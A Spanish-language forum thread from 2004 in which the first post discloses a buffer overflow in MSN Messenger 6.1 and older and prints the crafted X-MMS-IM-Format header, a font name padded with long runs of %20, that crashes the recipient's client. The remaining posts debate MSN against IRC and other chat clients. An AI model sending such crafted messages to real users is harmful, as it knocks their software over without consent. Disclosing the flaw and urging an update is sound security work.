FTP | CCD | Buscar | Trucos | Trabajo | Foros |
|
Registrarse | FAQ | Miembros | Calendario | Guía de estilo | Temas de Hoy |
|
Herramientas | Buscar en Tema | Desplegado |
#1
|
||||
|
||||
Fallo de seguridad en Msn Messenger
Hace poco (dos o tres semanas) se descubrió una falla de seguridad en el Msn. Ya se ha pedido a todos los usuarios que actualicen su msn. Aún así hay gente que no lo ha hecho. Esta falla afecta a los usuarios de la versión 6.1 hacia abajo y ha aparecido junto a otra falla que permitiría la ejecución de programas en el pc de la víctima.
Pongo aquí el exploit del fallo primero, que provoca la caída del usuario que lo recibe. El bug consiste en hacer un desbordamiento de buffer al enviar un mensaje con fuente formateada, al enviarle una cadena larga que provoca el desbordamiento y la caida del msn atacado. Lo explico más detenidamente:Este es el encabezado normal de envio de mensajes: Código:
MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; PF=22 Código:
MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20% 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20New%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20Roman%20%20%20%20%20%20%20%20%2 0%20%20; EF=B; CO=ff; CS=0; PF=22
__________________
:) |
#2
|
||||
|
||||
Quien usa el MSN Messenger cuando existe el aMSN
__________________
Guía de Estilo. |
#3
|
||||
|
||||
I do .
__________________
Héctor Geraldino Software Engineer |
#4
|
||||
|
||||
Pues yo... Kopete!!, en serio, me parece mejor que el Alvaro Messenger y lo que anda por ahí... ahora mismito voy a poner un tema en debates para ver que sale del tema.
__________________
:) |
#5
|
||||
|
||||
Usar el MSN existiendo el IRC me parece propio de gente desinformada.
Y al que diga eso de "es que mis 'contactos' usan el msn" le digo que eso no tiene ningún sentido, por ejemplo, yo tengo 'contactos' y saben que estoy en el IRC y si alguno me dice que el "usa el MSN" le enseño a usar el irc, y si no le interesa será porque tampoco necesitará nada de mí. Y si el que me dice eso es mi jefe o un cliente, le digo: "jefe, mas te vale desinstalar el MSN, a no ser que no te importe que cualquiere pueda leer tus conversaciones". Ojo: donde he escrito "gente desinformada" podría haber escrito "ignorantes" pero he preferido ser un poco moderado he dicho
__________________
"la única iglesia que ilumina es la que arde" Anonimo |
#6
|
||||
|
||||
¿Y con Irc no?, yo veo Irc el doble de inseguro que Msn... yo de Msn conozco dos fallos... y eso (y esoo!!!) que es de M$, pero de Irc conozco... puagh... existen montones... Messenger, sea cual sea el propietario, es un gran avance, pues te permite tener una lista de contactos y poder bloquear a tu gusto no estando a la vista de todos tu dirección Ip.
Además... ¿Puedes usar la webcam con irc?¿Puedes echarte una partidita al Buscaminas?¿Puedes escribir emoticonos?¿Hay algún "Messenger Plus!" (una muy buena extensión para Msn Messenger) para Irc?¿Hay nicks largos en irc?¿Tienes lista de contactos en irc o tienes que esperar a que se conecten a un canal?¿Puedes enviar un mensaje al móvil desde irc?¿Puedes ponerte "Estoy comiendo" o sólo en Ausente?¿Tiene fondo de ventana el irc?¿Puedes poner grupos a los canales en Irc? Si se puede... no lo sabía.
__________________
:) |
#7
|
||||
|
||||
mm, casi debate.
Yo solo argumento que detras de cualquier firewall empresarial, es sumamente extraño que los puertos de IRC esten abiertos, no asi messenger (es mi caso en los ultimos 3 trabajos que he tenido). Claro, que uso proxys externos, hopster y otras diabluras, pero eso soy yo como informatico. La gente promedio, de quienes hay unos cuantos en mi lista, no lograrian hacerlo sin ayuda.
__________________
Héctor Geraldino Software Engineer |
#8
|
|||||||||||||
|
|||||||||||||
Hola,
Cita:
Cita:
Cita:
Cita:
Cita:
Cita:
Cita:
Cita:
Cita:
Cita:
Cita:
Cita:
Cita:
Ahora pregunto yo: ¿Puedes (en MSN) crear canales protegidos, restringidos, cifrados, moderados, con acceso por invitación y sólo para oyentes... y todo ello bajo un protocolo estándar no sujeto a una plataforma o sistema operativo particular? Saludos. |
#9
|
||||
|
||||
Y a lo que dice kinobi yo añado:
A nadie le importa si "Julian esta escribiendo un mensaje" o si "Julian ha cerrado la ventana" o si "Julian le ha borrado de la lista de contactos" De verdad que la unica excusa que teneis quienes usais ese engendro (u otros similares) es la falta de información, pues si, por ejemplo DarkByte (y muchos otros) conociera lo suficiente del protocolo IRC, estoy completamente seguro de que se pondía un cliente de IRC y les diría a "sus contactos" como usarlo. Y todo eso por no hablar del hecho de que cuando usas el MSN estas comportandote como un obediente borrego del pastor BillGey. ¡saludos!
__________________
"la única iglesia que ilumina es la que arde" Anonimo |
#10
|
||||
|
||||
Cita:
La menos fácil: hacer tunneling con el putty. La fácil: http://www.irc-hispano.org/ Amos, quel que no se conecta al irc es por no quiere.
__________________
"la única iglesia que ilumina es la que arde" Anonimo |
#11
|
|||||
|
|||||
Cita:
Es necesario que un teléfono móvil haga fotos? No. Puede ser útil? Sí .Otra cosa es que el marketing quiera hacerte creer que es necesario que un teléfono haga fotos Cita:
Cita:
Cita:
"Si no te gusta la peli es porqué no la has entendido en su totalidad" Este tipo de afirmaciones suelen ser peligrosas y no llevan a ninguna parte. Las habré oido mil veces en referencia a cualquier tema... política, finanzas, arte... A veces hay cosas que no admiten respuestas categóricas. Cita:
Saludos! Última edición por __marcsc fecha: 08-08-2004 a las 21:51:06. |
#12
|
||||
|
||||
Cita:
Además, he dicho msn por poner un messenger (el más extendido, creo), pero también prefiero el yahoo messenger a irc para usarlo para comunicarme con una persona. Eso sí, hay veces que necesito IRC. Julián, tu respuesta me ha parecido un poco egoista y egocéntrica. No todos somos como tú. Yo tengo mi novia en otra ciudad y necesito estar en contacto diario con ella... ¿Sería lo mismo ver sus letras, las de una máquina, a oirla y verla con una conversación con voz y webcam?. No digo que irc sea malo, me encanta, y también he trabajado con el protocolo (he hecho varias pruebas de cliente irc). Creo que se trata de las prestaciones de cada servicio. Además, ¿tenemos que elegir entre Msn o Irc?. Yo personalmente uso los dos. Yo, como Marcs, utilizo Msn Messenger por sus prestaciones, no por la empresa que lo mantiene. Post 999: Viendo los pros y los contras de cada protocolo... un post más y soy milenario...
__________________
:) Última edición por DarkByte fecha: 09-08-2004 a las 01:04:21. |
#13
|
||||
|
||||
Hola,
Cita:
Cita:
En cuanto a las utilidades integradas, es también un tema subjetivo. No me gusta la tendencia que tiene MS a integrar funcionalidades en las aplicaciones. Reconozco que hace muchos años que me cautivo el "estilo mecano" de Unix. Si quiero una aplicación para comunicarme con mis amigos, la quiero sólo para eso y me sobra el que también me prepare el café por las mañanas. Saludos. |
#14
|
||||
|
||||
Hola,
Cita:
Cita:
Saludos. |
#15
|
||||
|
||||
Pues a mi no me vendría mal que me preparase tostadas.... verdad, marcsc?
|
#16
|
||||
|
||||
Cita:
Saludos. |
#17
|
||||
|
||||
Hola,
Cita:
Cita:
Cita:
Cita:
Saludos! |
#18
|
||||
|
||||
Cita:
__________________
:) |
#19
|
||||
|
||||
Cita:
Eso sí, paso de mermelada o mantequilla, que luego se cae al suelo por el lado de Murphy... |
#20
|
||||
|
||||
Nota al pie de pagina.
Intente conectarme a irc-hispano.org, pero durante toda la tarde me dio connection timeout (no encontre el website). Como no lo probe solo pregunto, ¿no usa applets? ¿javascript? Si son applets, ya he visto otros clientes irc-web, y necesitan igual lo de los puertos. Aunque irc y messenger son "medios de comunicacion" (si asi podrian llamarse), creo que cada uno tiene sus pros y contras, y quizas todas las cosas que se logran en messenger podrian implementarse en irc pero... no estan implementadas (al menos no en los clientes que recuerdo haber usado algun tiempo atras). Por cierto, que la integracion de nimiedades como webcam y voz cuenta mucho para el usuario promedio. Es por ese tipo de usuario por el que abogo, porque no todos los que estan en mi lista puedo pedirles que hagan tunneling con el putty o hopster, y menos que abran tres aplicaciones mas para integrar lo que ya una trae integrada por si misma.
__________________
Héctor Geraldino Software Engineer |
|
|
|